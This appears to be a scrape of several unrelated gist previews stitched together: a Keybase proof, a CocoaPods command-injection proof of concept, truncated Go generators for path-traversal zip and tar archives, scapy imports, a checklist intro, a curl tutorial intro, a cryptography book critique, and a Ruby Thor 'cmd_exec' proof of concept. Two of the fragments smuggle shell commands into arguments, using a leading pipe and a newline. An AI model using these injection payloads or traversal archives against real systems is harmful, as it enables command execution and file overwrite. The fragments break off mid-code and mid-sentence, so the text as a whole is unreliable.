I hereby claim:
- I am ecneladis on github.
- I am ecneladis (https://keybase.io/ecneladis) on keybase.
- I have a public key ASA-QJvmS7xazTLNCuqXhhaFp8-904eA3dtM89QLwfrY1wo
To claim this, I am signing this object:
# https://github.com/CocoaPods/CocoaPods/blob/cae98c5386f7d80d6fe065c3f081ce130628151a/lib/cocoapods/command/spec/lint.rb#L100-L107
pod spec lint "|touch /tmp/test;\nhttps://url.co"
package main
import (
	"archive/zip"
	"os"
	"log"
)
func main() {
	f, err := os.Create("traversal.zip")
package main
import (
	"archive/tar"
	"os"
	"log"
)
func main() {
	f, err := os.Create("traversal.tar")
from scapy.all import *
import unicodedata
import sys, getopt
import time, datetime
import argparse
import socket
import fcntl
import struct
import threading
A checklist for designing and developing internet scale services, inspired by James Hamilton's 2007 paper "On Designing and Deploying Internet-Scale Services."
Let's have some command-line fun with curl, [jq][1], and the [new GitHub Search API][2].
Today we're looking for:
Wow. I've now read the whole book and much of the supporting code. I'm not a fan, and recommend against relying on it. Here's a laundry list of concerns:
The teaching method the book uses is badly flawed. The book's strategy is to start simple and build to complexity, which makes sense if you're teaching algebra but not if you're teaching heart surgery. The result is that each chapter culminates with the implementation of a system that is grievously insecure. Little warning is given of this, apart from allusions to future chapters improving the system. For instance, Chapter 2 closes with a chat system that uses AES-CBC without an authenticator.
The book is full of idiosyncratic recommendations. For instance, AES-CBC requires a padding scheme. There is a standard padding scheme. The book purports to present it, but instead of PKCS7, it presents 80h+00h..00h.
At one point about 1/3rd of the way through the book, it suggests using a SHA256 hash of the plaintext as an authenticator for a message. Thi
#!/usr/bin/env ruby
require 'thor'
class CLI < Thor
  include Thor::Actions
  desc "cmd_exec", "cmd_exec poc"
  def cmd_exec()
    get "|uname -a > cmd_exec_test;\nhttps://gist.github.com", "/tmp/dsadas"